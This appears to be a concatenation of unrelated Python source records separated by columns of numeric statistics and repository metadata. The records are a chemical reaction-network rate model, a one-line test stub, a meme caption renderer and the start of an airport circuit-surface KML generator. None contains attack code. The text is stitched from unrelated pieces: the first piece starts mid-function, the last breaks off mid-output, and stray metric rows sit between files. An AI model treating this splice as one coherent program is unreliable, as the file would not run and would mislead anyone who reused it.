P[4] = +k[1]*S[2]+k[24]*S[6]+k[37]*S[5]*S[10]+k[49]*S[16]+k[52]*S[20]+k[53]*S[25]-k[2]*S[4]*S[5]-k[11]*S[4]*S[2]-k[15]*S[4]*S[2]-k[19]*S[4]*S[2]-k[27]*S[4]*S[1]
P[5] = +k[24]*S[6]+k[36]*S[7]*S[1]+k[41]*S[12]+k[45]*S[22]-k[2]*S[4]*S[5]-k[7]*S[7]*S[5]-k[17]*S[7]*S[5]-k[37]*S[5]*S[10]-k[42]*S[5]*S[10]
P[6] = +k[2]*S[4]*S[5]-k[9]*S[6]*S[1]-k[24]*S[6]
P[7] = +k[6]*S[8]+k[30]*S[11]+k[41]*S[12]+k[45]*S[22]+k[47]*S[17]+k[48]*S[15]-k[3]*S[7]*S[2]-k[7]*S[7]*S[5]-k[12]*S[7]*S[2]-k[17]*S[7]*S[5]-k[36]*S[7]*S[1]
P[8] = +k[3]*S[7]*S[2]+k[51]*S[18]-k[4]*S[8]*S[1]-k[6]*S[8]-k[13]*S[8]*S[1]
P[9] = +k[4]*S[8]*S[1]-k[5]*S[9]*S[10]-k[34]*S[9]*S[10]
P[10] = -k[5]*S[9]*S[10]-k[8]*S[2]*S[10]-k[10]*S[14]*S[10]-k[18]*S[10]*S[22]*S[1]-k[21]*S[26]*S[10]-k[29]*S[26]*S[10]-k[34]*S[9]*S[10]-k[35]*S[31]*S[10]-k[37]*S[5]*S[10]-k[42]*S[5]*S[10]-k[46]*S[26]*S[10]-k[55]*S[10]*S[12]*S[1]-k[56]*S[2]*S[10]-k[57]*S[18]*S[10]
P[11] = +k[5]*S[9]*S[10]+k[26]*S[30]-k[30]*S[11]-k[32]*S[11]*S[1]-k[38]*S[11]*S[1]
P[12] = +k[7]*S[7]*S[5]-k[28]*S[12]*S[1]-k[41]*S[12]-k[55]*S[10]*S[12]*S[1]
P[13] = +k[8]*S[2]*S[10]+k[31]*S[26]-k[20]*S[13]*S[1]
P[14] = +k[9]*S[6]*S[1]-k[10]*S[14]*S[10]
P[15] = +k[10]*S[14]*S[10]+k[33]*S[32]-k[48]*S[15]
P[16] = +k[11]*S[4]*S[2]+k[34]*S[9]*S[10]-k[49]*S[16]
P[17] = +k[12]*S[7]*S[2]+k[46]*S[26]*S[10]-k[47]*S[17]
P[18] = +k[13]*S[8]*S[1]+k[50]*S[19]*S[1]+k[54]*S[27]*S[1]-k[14]*S[18]*S[3]-k[40]*S[18]*S[3]-k[51]*S[18]*S[3]-k[57]*S[18]*S[10]
P[19] = +k[14]*S[18]+k[29]*S[26]*S[10]+k[35]*S[31]*S[10]-k[50]*S[19]*S[1]
P[20] = +k[15]*S[4]*S[2]-k[52]*S[20]
P[21] = +k[16]*S[0]*S[2]
P[22] = +k[17]*S[7]*S[5]+k[44]*S[26]-k[18]*S[10]*S[22]*S[1]-k[45]*S[22]
P[23] = +k[18]*S[10]*S[22]*S[1]
P[24] = +k[18]*S[10]*S[22]*S[1]+k[55]*S[10]*S[12]*S[1]
P[25] = +k[19]*S[4]*S[2]+k[39]*S[30]-k[22]*S[25]*S[1]-k[25]*S[25]*S[1]-k[53]*S[25]
P[26] = +k[20]*S[13]*S[1]+k[28]*S[12]*S[1]-k[21]*S[26]*S[10]-k[29]*S[26]*S[10]-k[31]*S[26]*S[3]-k[44]*S[26]*S[3]-k[46]*S[26]*S[10]
P[27] = +k[21]*S[26]*S[10]+k[40]*S[18]-k[54]*S[27]*S[1]
P[28] = +k[22]*S[25]*S[1]-k[23]*S[28]*S[3]
P[29] = +k[23]*S[28]
P[30] = +k[25]*S[25]*S[1]+k[38]*S[11]*S[1]-k[26]*S[30]*S[3]-k[39]*S[30]*S[3]
P[31] = +k[30]*S[11]+k[48]*S[15]-k[35]*S[31]*S[10]
P[32] = +k[32]*S[11]*S[1]-k[33]*S[32]*S[3]
P[33] = +k[42]*S[5]*S[10]-k[43]*S[33]*S[1]
P[34] = +k[55]*S[10]*S[12]*S[1]
P[35] = +k[56]*S[2]*S[10]
P[36] = +k[57]*S[18]*S[10]
return P
def wrapper_function(time, S, k):
return model_function(time, S, k)
species = {
'O=C(CO)CO':0,
'[OH-]':1,
'OC=C(O)CO':2,
'O':3,
'O=C[C@H](O)CO':4,
'OC=CO':5,
'O=C[C@@H](O)[C@@H](O)[C@H](O)CO':6,
'O=CCO':7,
'O=C(CO)[C@H](O)[C@H](O)CO':8,
'OC=C(O)[C@H](O)[C@H](O)CO':9,
'C=O':10,
'O=C([C@@H](O)CO)[C@H](O)[C@H](O)CO':11,
'O=C[C@@H](O)[C@H](O)CO':12,
'O=C(CO)[C@H](O)CO':13,
'OC=C(O)[C@@H](O)[C@H](O)CO':14,
'O=C([C@@H](O)CO)[C@@H](O)[C@H](O)CO':15,
'O=C[C@@](O)(CO)[C@H](O)[C@H](O)CO':16,
'O=C[C@@](O)(CO)[C@H](O)CO':17,
'OCC(O)=C(O)[C@H](O)CO':18,
'O=C([C@@H](O)CO)[C@H](O)CO':19,
'O=C[C@@](O)(CO)[C@@H](O)[C@H](O)CO':20,
'O=C[C@@](O)(CO)C(O)(CO)CO':21,
'O=C[C@H](O)[C@H](O)CO':22,
'OC[C@H](O)[C@H](O)CO':23,
'O=CO':24,
'O=C(CO)[C@H](O)[C@H](O)[C@H](O)CO':25,
'OC=C(O)[C@H](O)CO':26,
'O=C([C@H](O)CO)[C@H](O)CO':27,
'OC=C(O)[C@H](O)[C@H](O)[C@H](O)CO':28,
'O=C[C@H](O)[C@H](O)[C@H](O)[C@H](O)CO':29,
'OCC(O)=C(O)[C@H](O)[C@H](O)CO':30,
'OC=C(O)[C@@H](O)CO':31,
'OC[C@H](O)C(O)=C(O)[C@H](O)CO':32,
'O=C[C@@H](O)CO':33,
'OC[C@@H](O)[C@H](O)CO':34,
'O=CC(O)(CO)CO':35,
'O=C(CO)[C@](O)(CO)[C@H](O)CO':36,
}
reactions = {
'O=C(CO)CO.[OH-]>>OC=C(O)CO.[OH-]':0,
'O.OC=C(O)CO>>O.O=C[C@H](O)CO':1,
'O=C[C@H](O)CO.OC=CO>>O=C[C@@H](O)[C@@H](O)[C@H](O)CO':2,
'O=CCO.OC=C(O)CO>>O=C(CO)[C@H](O)[C@H](O)CO':3,
'O=C(CO)[C@H](O)[C@H](O)CO.[OH-]>>OC=C(O)[C@H](O)[C@H](O)CO.[OH-]':4,
'C=O.OC=C(O)[C@H](O)[C@H](O)CO>>O=C([C@@H](O)CO)[C@H](O)[C@H](O)CO':5,
'O=C(CO)[C@H](O)[C@H](O)CO>>O=CCO.OC=C(O)CO':6,
'O=CCO.OC=CO>>O=C[C@@H](O)[C@H](O)CO':7,
'C=O.OC=C(O)CO>>O=C(CO)[C@H](O)CO':8,
'O=C[C@@H](O)[C@@H](O)[C@H](O)CO.[OH-]>>OC=C(O)[C@@H](O)[C@H](O)CO.[OH-]':9,
'C=O.OC=C(O)[C@@H](O)[C@H](O)CO>>O=C([C@@H](O)CO)[C@@H](O)[C@H](O)CO':10,
'O=C[C@H](O)CO.OC=C(O)CO>>O=C[C@@](O)(CO)[C@H](O)[C@H](O)CO':11,
'O=CCO.OC=C(O)CO>>O=C[C@@](O)(CO)[C@H](O)CO':12,
'O=C(CO)[C@H](O)[C@H](O)CO.[OH-]>>OCC(O)=C(O)[C@H](O)CO.[OH-]':13,
'O.OCC(O)=C(O)[C@H](O)CO>>O.O=C([C@@H](O)CO)[C@H](O)CO':14,
'O=C[C@H](O)CO.OC=C(O)CO>>O=C[C@@](O)(CO)[C@@H](O)[C@H](O)CO':15,
'O=C(CO)CO.OC=C(O)CO>>O=C[C@@](O)(CO)C(O)(CO)CO':16,
'O=CCO.OC=CO>>O=C[C@H](O)[C@H](O)CO':17,
'C=O.O=C[C@H](O)[C@H](O)CO.[OH-]>>O=CO.OC[C@H](O)[C@H](O)CO':18,
'O=C[C@H](O)CO.OC=C(O)CO>>O=C(CO)[C@H](O)[C@H](O)[C@H](O)CO':19,
'O=C(CO)[C@H](O)CO.[OH-]>>OC=C(O)[C@H](O)CO.[OH-]':20,
'C=O.OC=C(O)[C@H](O)CO>>O=C([C@H](O)CO)[C@H](O)CO':21,
'O=C(CO)[C@H](O)[C@H](O)[C@H](O)CO.[OH-]>>OC=C(O)[C@H](O)[C@H](O)[C@H](O)CO.[OH-]':22,
'O.OC=C(O)[C@H](O)[C@H](O)[C@H](O)CO>>O.O=C[C@H](O)[C@H](O)[C@H](O)[C@H](O)CO':23,
'O=C[C@@H](O)[C@@H](O)[C@H](O)CO>>O=C[C@H](O)CO.OC=CO':24,
'O=C(CO)[C@H](O)[C@H](O)[C@H](O)CO.[OH-]>>OCC(O)=C(O)[C@H](O)[C@H](O)CO.[OH-]':25,
'O.OCC(O)=C(O)[C@H](O)[C@H](O)CO>>O.O=C([C@@H](O)CO)[C@H](O)[C@H](O)CO':26,
'O=C[C@H](O)CO.[OH-]>>OC=C(O)CO.[OH-]':27,
'O=C[C@@H](O)[C@H](O)CO.[OH-]>>OC=C(O)[C@H](O)CO.[OH-]':28,
'C=O.OC=C(O)[C@H](O)CO>>O=C([C@@H](O)CO)[C@H](O)CO':29,
'O=C([C@@H](O)CO)[C@H](O)[C@H](O)CO>>O=CCO.OC=C(O)[C@@H](O)CO':30,
'O.OC=C(O)[C@H](O)CO>>O.O=C(CO)[C@H](O)CO':31,
'O=C([C@@H](O)CO)[C@H](O)[C@H](O)CO.[OH-]>>OC[C@H](O)C(O)=C(O)[C@H](O)CO.[OH-]':32,
'O.OC[C@H](O)C(O)=C(O)[C@H](O)CO>>O.O=C([C@@H](O)CO)[C@@H](O)[C@H](O)CO':33,
'C=O.OC=C(O)[C@H](O)[C@H](O)CO>>O=C[C@@](O)(CO)[C@H](O)[C@H](O)CO':34,
'C=O.OC=C(O)[C@@H](O)CO>>O=C([C@@H](O)CO)[C@H](O)CO':35,
'O=CCO.[OH-]>>OC=CO.[OH-]':36,
'C=O.OC=CO>>O=C[C@H](O)CO':37,
'O=C([C@@H](O)CO)[C@H](O)[C@H](O)CO.[OH-]>>OCC(O)=C(O)[C@H](O)[C@H](O)CO.[OH-]':38,
'O.OCC(O)=C(O)[C@H](O)[C@H](O)CO>>O.O=C(CO)[C@H](O)[C@H](O)[C@H](O)CO':39,
'O.OCC(O)=C(O)[C@H](O)CO>>O.O=C([C@H](O)CO)[C@H](O)CO':40,
'O=C[C@@H](O)[C@H](O)CO>>O=CCO.OC=CO':41,
'C=O.OC=CO>>O=C[C@@H](O)CO':42,
'O=C[C@@H](O)CO.[OH-]>>OC=C(O)CO.[OH-]':43,
'O.OC=C(O)[C@H](O)CO>>O.O=C[C@H](O)[C@H](O)CO':44,
'O=C[C@H](O)[C@H](O)CO>>O=CCO.OC=CO':45,
'C=O.OC=C(O)[C@H](O)CO>>O=C[C@@](O)(CO)[C@H](O)CO':46,
'O=C[C@@](O)(CO)[C@H](O)CO>>O=CCO.OC=C(O)CO':47,
'O=C([C@@H](O)CO)[C@@H](O)[C@H](O)CO>>O=CCO.OC=C(O)[C@@H](O)CO':48,
'O=C[C@@](O)(CO)[C@H](O)[C@H](O)CO>>O=C[C@H](O)CO.OC=C(O)CO':49,
'O=C([C@@H](O)CO)[C@H](O)CO.[OH-]>>OCC(O)=C(O)[C@H](O)CO.[OH-]':50,
'O.OCC(O)=C(O)[C@H](O)CO>>O.O=C(CO)[C@H](O)[C@H](O)CO':51,
'O=C[C@@](O)(CO)[C@@H](O)[C@H](O)CO>>O=C[C@H](O)CO.OC=C(O)CO':52,
'O=C(CO)[C@H](O)[C@H](O)[C@H](O)CO>>O=C[C@H](O)CO.OC=C(O)CO':53,
'O=C([C@H](O)CO)[C@H](O)CO.[OH-]>>OCC(O)=C(O)[C@H](O)CO.[OH-]':54,
'C=O.O=C[C@@H](O)[C@H](O)CO.[OH-]>>O=CO.OC[C@@H](O)[C@H](O)CO':55,
'C=O.OC=C(O)CO>>O=CC(O)(CO)CO':56,
'C=O.OCC(O)=C(O)[C@H](O)CO>>O=C(CO)[C@](O)(CO)[C@H](O)CO':57,
}
inputs = {
}
k = np.zeros(max(reactions.values())+1) # rate constants
S = np.zeros(len(species)) # initial concentrations
C = np.zeros(len(inputs)) # input concentrations
time_offset = 9000.0
lead_in_time = 8130.25
| 48.274725
| 546
| 0.459936
| 2,839
| 8,786
| 1.420923
| 0.039803
| 0.111056
| 0.166584
| 0.173525
| 0.841349
| 0.785573
| 0.738473
| 0.60585
| 0.577095
| 0.504462
| 0
| 0.147646
| 0.042568
| 8,786
| 182
| 547
| 48.274725
| 0.331907
| 0.006601
| 0
| 0.030675
| 0
| 0.392638
| 0.433467
| 0.415587
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01227
| false
| 0
| 0.01227
| 0.006135
| 0.03681
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f1877cd6a90592d2cec06512180d03f6c81a36b1
| 40
|
py
|
Python
|
tests/test_api.py
|
lingpy/linse
|
139e54c4ce281a2cd5db1b4da4c516ec1e47dbf2
|
[
"Apache-2.0"
] | 1
|
2020-08-17T06:51:53.000Z
|
2020-08-17T06:51:53.000Z
|
tests/test_api.py
|
lingpy/linse
|
139e54c4ce281a2cd5db1b4da4c516ec1e47dbf2
|
[
"Apache-2.0"
] | 20
|
2020-04-22T15:15:18.000Z
|
2020-08-06T14:07:03.000Z
|
tests/test_api.py
|
lingpy/linse
|
139e54c4ce281a2cd5db1b4da4c516ec1e47dbf2
|
[
"Apache-2.0"
] | null | null | null |
import linse
def test_api():
pass
| 6.666667
| 15
| 0.65
| 6
| 40
| 4.166667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.275
| 40
| 5
| 16
| 8
| 0.862069
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
74fb9ef4a6438457c030e6f371b97052d668d294
| 10,261
|
py
|
Python
|
src/text_alignment.py
|
developers-cosmos/Meme-Generator
|
fba9b6ca8567228e98f9b7f9e2a7e8407f825cd7
|
[
"Apache-2.0"
] | 75
|
2020-04-29T09:22:19.000Z
|
2021-09-29T09:06:45.000Z
|
src/text_alignment.py
|
jaffery0605/Meme-Generator
|
74e32c76fda5252e0ee2e7dff88f0eccecc04c1b
|
[
"Apache-2.0"
] | 9
|
2020-05-08T09:06:20.000Z
|
2022-02-14T17:34:37.000Z
|
src/text_alignment.py
|
jaffery0605/Meme-Generator
|
74e32c76fda5252e0ee2e7dff88f0eccecc04c1b
|
[
"Apache-2.0"
] | 30
|
2020-04-28T15:15:20.000Z
|
2022-01-13T03:32:33.000Z
|
import random
import cv2
from PIL import Image,ImageDraw,ImageFont
import numpy as np
def lenghth(a):
s=len(a)
if(s<12):
return 36
elif(s<20):
return 26
else:
return (48-len(a))
def text_alignment(label,im):
label='memes/'+label+".txt"
f=open(label,'r')
s=[x for x in f]
#print(s)
w=300
h=300
color=(255,255,255)
dim=(w,h)
a=random.choice(s)
print(a)
a=list(a.split('|'))
shadowcolor=(0,0,0)
try:
im= cv2.resize(im, dim, interpolation = cv2.INTER_AREA)
cv2_im_rgb = cv2.cvtColor(im,cv2.COLOR_BGR2RGB)
pil_im = Image.fromarray(cv2_im_rgb)
draw = ImageDraw.Draw(pil_im)
font = ImageFont.truetype("font.ttf", 40)
if(len(a)==1):
org=29-len(a[0])+2,230
x,y=org
fontScale=lenghth(a[0])
font = ImageFont.truetype("font.ttf", fontScale)
# thin border
text = a[0][:-1]
draw.text((x-1, y), text, font=font, fill=shadowcolor)
draw.text((x+1, y), text, font=font, fill=shadowcolor)
draw.text((x, y-1), text, font=font, fill=shadowcolor)
draw.text((x, y+1), text, font=font, fill=shadowcolor)
# thicker border
draw.text((x-1, y-1), text, font=font, fill=shadowcolor)
draw.text((x+1, y-1), text, font=font, fill=shadowcolor)
draw.text((x-1, y+1), text, font=font, fill=shadowcolor)
draw.text((x+1, y+1), text, font=font, fill=shadowcolor)
draw.text(org, a[0][:-1],color, font=font)
im = cv2.cvtColor(np.array(pil_im), cv2.COLOR_RGB2BGR)
elif(len(a)==2):
org=29-len(a[0])+2,7
x,y=org
fontScale=lenghth(a[0])
font = ImageFont.truetype("font.ttf", fontScale)
# thin border
text = a[0]
draw.text((x-1, y), text, font=font, fill=shadowcolor)
draw.text((x+1, y), text, font=font, fill=shadowcolor)
draw.text((x, y-1), text, font=font, fill=shadowcolor)
draw.text((x, y+1), text, font=font, fill=shadowcolor)
# thicker border
draw.text((x-1, y-1), text, font=font, fill=shadowcolor)
draw.text((x+1, y-1), text, font=font, fill=shadowcolor)
draw.text((x-1, y+1), text, font=font, fill=shadowcolor)
draw.text((x+1, y+1), text, font=font, fill=shadowcolor)
draw.text(org, a[0],color, font=font)
im = cv2.cvtColor(np.array(pil_im), cv2.COLOR_RGB2BGR)
org=29-len(a[1])+2,230
x,y=org
fontScale=lenghth(a[1])
font = ImageFont.truetype("font.ttf", fontScale)
# thin border
text = a[1]
draw.text((x-1, y), text, font=font, fill=shadowcolor)
draw.text((x+1, y), text, font=font, fill=shadowcolor)
draw.text((x, y-1), text, font=font, fill=shadowcolor)
draw.text((x, y+1), text, font=font, fill=shadowcolor)
# thicker border
draw.text((x-1, y-1), text, font=font, fill=shadowcolor)
draw.text((x+1, y-1), text, font=font, fill=shadowcolor)
draw.text((x-1, y+1), text, font=font, fill=shadowcolor)
draw.text((x+1, y+1), text, font=font, fill=shadowcolor)
draw.text(org, a[1],color, font=font)
im = cv2.cvtColor(np.array(pil_im), cv2.COLOR_RGB2BGR)
elif(len(a)==3):
org=29-len(a[0])+2,7
x,y=org
fontScale=lenghth(a[0])
font = ImageFont.truetype("font.ttf", fontScale)
# thin border
text = a[0]
draw.text((x-1, y), text, font=font, fill=shadowcolor)
draw.text((x+1, y), text, font=font, fill=shadowcolor)
draw.text((x, y-1), text, font=font, fill=shadowcolor)
draw.text((x, y+1), text, font=font, fill=shadowcolor)
# thicker border
draw.text((x-1, y-1), text, font=font, fill=shadowcolor)
draw.text((x+1, y-1), text, font=font, fill=shadowcolor)
draw.text((x-1, y+1), text, font=font, fill=shadowcolor)
draw.text((x+1, y+1), text, font=font, fill=shadowcolor)
draw.text(org, a[0],color, font=font)
im = cv2.cvtColor(np.array(pil_im), cv2.COLOR_RGB2BGR)
org=29-len(a[1])+2,210
x,y = org
fontScale=lenghth(a[1])
font = ImageFont.truetype("font.ttf", fontScale)
# thin border
text = a[1]
draw.text((x-1, y), text, font=font, fill=shadowcolor)
draw.text((x+1, y), text, font=font, fill=shadowcolor)
draw.text((x, y-1), text, font=font, fill=shadowcolor)
draw.text((x, y+1), text, font=font, fill=shadowcolor)
# thicker border
draw.text((x-1, y-1), text, font=font, fill=shadowcolor)
draw.text((x+1, y-1), text, font=font, fill=shadowcolor)
draw.text((x-1, y+1), text, font=font, fill=shadowcolor)
draw.text((x+1, y+1), text, font=font, fill=shadowcolor)
draw.text(org, a[1],color, font=font)
im = cv2.cvtColor(np.array(pil_im), cv2.COLOR_RGB2BGR)
org=29-len(a[2])+2,239
x,y = org
fontScale=lenghth(a[2])
font = ImageFont.truetype("font.ttf", fontScale)
# thin border
text = a[2][:-1]
draw.text((x-1, y), text, font=font, fill=shadowcolor)
draw.text((x+1, y), text, font=font, fill=shadowcolor)
draw.text((x, y-1), text, font=font, fill=shadowcolor)
draw.text((x, y+1), text, font=font, fill=shadowcolor)
# thicker border
draw.text((x-1, y-1), text, font=font, fill=shadowcolor)
draw.text((x+1, y-1), text, font=font, fill=shadowcolor)
draw.text((x-1, y+1), text, font=font, fill=shadowcolor)
draw.text((x+1, y+1), text, font=font, fill=shadowcolor)
draw.text(org, a[2][:-1],color, font=font)
im = cv2.cvtColor(np.array(pil_im), cv2.COLOR_RGB2BGR)
else:
org=29-len(a[0])+2,7
x,y = org
fontScale=lenghth(a[0])
font = ImageFont.truetype("font.ttf", fontScale)
# thin border
text = a[0]
draw.text((x-1, y), text, font=font, fill=shadowcolor)
draw.text((x+1, y), text, font=font, fill=shadowcolor)
draw.text((x, y-1), text, font=font, fill=shadowcolor)
draw.text((x, y+1), text, font=font, fill=shadowcolor)
# thicker border
draw.text((x-1, y-1), text, font=font, fill=shadowcolor)
draw.text((x+1, y-1), text, font=font, fill=shadowcolor)
draw.text((x-1, y+1), text, font=font, fill=shadowcolor)
draw.text((x+1, y+1), text, font=font, fill=shadowcolor)
draw.text(org, a[0],color, font=font)
im = cv2.cvtColor(np.array(pil_im), cv2.COLOR_RGB2BGR)
org=29-len(a[1])+2,40
x,y=org
fontScale=lenghth(a[1])
font = ImageFont.truetype("font.ttf", fontScale)
# thin border
text = a[1]
draw.text((x-1, y), text, font=font, fill=shadowcolor)
draw.text((x+1, y), text, font=font, fill=shadowcolor)
draw.text((x, y-1), text, font=font, fill=shadowcolor)
draw.text((x, y+1), text, font=font, fill=shadowcolor)
# thicker border
draw.text((x-1, y-1), text, font=font, fill=shadowcolor)
draw.text((x+1, y-1), text, font=font, fill=shadowcolor)
draw.text((x-1, y+1), text, font=font, fill=shadowcolor)
draw.text((x+1, y+1), text, font=font, fill=shadowcolor)
draw.text(org, a[1],color, font=font)
im = cv2.cvtColor(np.array(pil_im), cv2.COLOR_RGB2BGR)
org=29-len(a[2])+2,220
x,y = org
fontScale=lenghth(a[2])
font = ImageFont.truetype("font.ttf", fontScale)
# thin border
text = a[2]
draw.text((x-1, y), text, font=font, fill=shadowcolor)
draw.text((x+1, y), text, font=font, fill=shadowcolor)
draw.text((x, y-1), text, font=font, fill=shadowcolor)
draw.text((x, y+1), text, font=font, fill=shadowcolor)
# thicker border
draw.text((x-1, y-1), text, font=font, fill=shadowcolor)
draw.text((x+1, y-1), text, font=font, fill=shadowcolor)
draw.text((x-1, y+1), text, font=font, fill=shadowcolor)
draw.text((x+1, y+1), text, font=font, fill=shadowcolor)
draw.text(org, a[2],color, font=font)
im = cv2.cvtColor(np.array(pil_im), cv2.COLOR_RGB2BGR)
org=29-len(a[3])+2,250
x,y=org
fontScale=lenghth(a[3])
font = ImageFont.truetype("font.ttf", fontScale)
# thin border
text = a[3][:-1]
draw.text((x-1, y), text, font=font, fill=shadowcolor)
draw.text((x+1, y), text, font=font, fill=shadowcolor)
draw.text((x, y-1), text, font=font, fill=shadowcolor)
draw.text((x, y+1), text, font=font, fill=shadowcolor)
# thicker border
draw.text((x-1, y-1), text, font=font, fill=shadowcolor)
draw.text((x+1, y-1), text, font=font, fill=shadowcolor)
draw.text((x-1, y+1), text, font=font, fill=shadowcolor)
draw.text((x+1, y+1), text, font=font, fill=shadowcolor)
draw.text(org, a[3][:-1],color, font=font)
im = cv2.cvtColor(np.array(pil_im), cv2.COLOR_RGB2BGR)
return im
except Exception as e:
print(e)
img = cv2.imread('static/dontdelete/wrong.jpg')
img = cv2.resize(img,(300,300))
return img
| 42.400826
| 69
| 0.521879
| 1,450
| 10,261
| 3.673103
| 0.062759
| 0.135186
| 0.135186
| 0.24033
| 0.900113
| 0.894855
| 0.888847
| 0.888847
| 0.887533
| 0.887533
| 0
| 0.042632
| 0.31878
| 10,261
| 241
| 70
| 42.576763
| 0.719313
| 0.027093
| 0
| 0.715789
| 0
| 0
| 0.013065
| 0.002777
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010526
| false
| 0
| 0.021053
| 0
| 0.057895
| 0.010526
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
741193307cd6bbe7f9207126f54840e8f9d4f011
| 13,554
|
py
|
Python
|
Circ.py
|
LHoBiz/ols_engine
|
9bdbd827f7be17aee95d416255a7f483472c4315
|
[
"MIT"
] | 1
|
2022-01-05T07:38:06.000Z
|
2022-01-05T07:38:06.000Z
|
Circ.py
|
LHoBiz/ols_engine
|
9bdbd827f7be17aee95d416255a7f483472c4315
|
[
"MIT"
] | null | null | null |
Circ.py
|
LHoBiz/ols_engine
|
9bdbd827f7be17aee95d416255a7f483472c4315
|
[
"MIT"
] | null | null | null |
# -*- coding: cp1252 -*-
import math
import OLSDims
import mdl
import EnvSettings
from osgeo import osr
ip = mdl.Data()
f=ip.f
AppOLS = OLSDims.AppDim.AppOLS
AppOLSNAME=OLSDims.AppDim.AppOLSNAME
AppOLSDIMS=OLSDims.AppDim.AppOLSDIMS
NRunwayInfo=ip.NRunwayInfo
SRunwayInfo=ip.SRunwayInfo
NIns = ip.NIns
if NIns == 'Y':
NPrc=ip.NPrc
if NPrc != 'N':
NBLDist=ip.NBLDist
CN = ip.CN
DayOnly = ip.CN
CL=ip.CL
RED=ip.RED
MTOW5700kg = ip.MTOW5700kg
RPT = ip.RPT
SIns = ip.SIns
if SIns == 'Y':
SPrc=ip.SPrc
if SPrc != 'N':
SBLDist=ip.SBLDist
RPT = ip.RPT
RWY_WID=ip.RWY_WID
RSW=ip.RSW
CodeNo = range(len(AppOLS))
Surfaces = range(len(AppOLS[0]))
NE=ip.NE
SE=ip.SE
NTE=ip.NTE
NTN=ip.NTN
STE=ip.STE
STN=ip.STN
ARP=ip.ARP
SE=ip.SE
NE=ip.NE
zone=ip.zone
KML_NAME=ip.KML_NAME
completeName=ip.completeName
RwyLen = math.sqrt((NTE-STE)*(NTE-STE) + (NTN-STN)*(NTN-STN))
def getParPerp(line,aye,dim,StraightCurv):
if line == 0: ## straight
if aye == 0: ##category of aircraft
extra = 1.5*1852
parra=1.0*1852
elif aye == 1:##category of aircraft
extra = 2.0*1852
parra=1.5*1852
length = RwyLen+extra
if line == 1:
if aye == 0: ##category of aircraft
extra = 1.5*1852
if StraightCurv == 's':
parra=0
elif StraightCurv == 'c':
parra=1.0*1852
elif aye == 1:##category of aircraft
extra = 2.0*1852
if StraightCurv == 's':
parra=0
elif StraightCurv == 'c':
parra=1.5*1852
length = RwyLen+extra
if dim == 'parr':
return parra
if dim == 'extr':
return extra
if dim == 'lenth':
return length
def NCirc(accur):
s = []
StraightCurv = 's'
Square = []
count = 0
ct = 0
for aye in range(2): #cats
for line in range(2): #in n out
I = range(int(1+math.ceil(getParPerp(line,aye,'lenth',StraightCurv)/accur)))
L = []
for j in I:
par = accur*j
if par >= getParPerp(line,aye,'lenth',StraightCurv):
par = getParPerp(line,aye,'lenth',StraightCurv)
perp = getParPerp(line,aye,'parr',StraightCurv)
Z=NE
L.append([par,perp,Z])
s.append(L)
t=[]
StraightCurv = 'c'
for aye in range(2):
for line in range(2): #near or far
Curvs1 = 2*math.pi*(getParPerp(line,aye,'parr',StraightCurv)/2/2) / accur
Curvs = range(1+int(math.ceil(Curvs1)))
K = []
for j in Curvs:
angle=j*180/Curvs1
if angle >= 180:
angle = 180
if line == 0:
par = (getParPerp(line,aye,'parr',StraightCurv)/2)*(math.sin\
(\
math.radians\
(\
(-1)*angle\
)\
))
elif line == 1:
par = getParPerp(line,aye,'lenth',StraightCurv) + (getParPerp(line,aye,'parr',StraightCurv)/2)*(math.sin\
(\
math.radians\
(\
angle\
)\
))
if line == 0:
perp = math.sqrt(math.fabs((getParPerp(line,aye,'parr',StraightCurv)/2)*(getParPerp(line,aye,'parr',StraightCurv)/2)-par*par)) + getParPerp(line,aye,'parr',StraightCurv)/2
if angle >= 90:
perp = -1*math.sqrt(math.fabs((getParPerp(line,aye,'parr',StraightCurv)/2)*(getParPerp(line,aye,'parr',StraightCurv)/2)-par*par)) + getParPerp(line,aye,'parr',StraightCurv)/2
elif line == 1:
perp = -1*math.sqrt(math.fabs((getParPerp(line,aye,'parr',StraightCurv)/2)*(getParPerp(line,aye,'parr',StraightCurv)/2)-(par- getParPerp(line,aye,'lenth',StraightCurv))*(par- getParPerp(line,aye,'lenth',StraightCurv)))) \
+ getParPerp(line,aye,'parr',StraightCurv)/2
if angle >= 90:
perp = math.sqrt(math.fabs((getParPerp(line,aye,'parr',StraightCurv)/2)*(getParPerp(line,aye,'parr',StraightCurv)/2)-(par - getParPerp(line,aye,'lenth',StraightCurv))*(par - getParPerp(line,aye,'lenth',StraightCurv)))) \
+ getParPerp(line,aye,'parr',StraightCurv)/2
Z=NE
K.append([par,perp,Z])
t.append(K)
F = [1,-1]
for n in range(2):
if n == 0:
OlsSurf = 'Runway 30 Cat A / B Circuit'
if n == 1:
OlsSurf = 'Runway 30 Cat C Circuit'
f.write( '<Folder>\n')
f.write( '<ScreenOverlay>\n')
f.write( '<name>Runway: Code '+str(int(CN))+CL+NRunwayInfo+'</name>\n')
f.write( '<visibility>0</visibility>\n')
f.write('<overlayXY x="0" y="0" xunits="fraction" yunits="fraction"/>\n')
f.write('<screenXY x="25" y="95" xunits="pixels" yunits="pixels"/>\n')
f.write('<rotationXY x="0.5" y="0.5" xunits="fraction" yunits="fraction"/>\n')
f.write('<size x="0" y="0" xunits="pixels" yunits="pixels"/>\n')
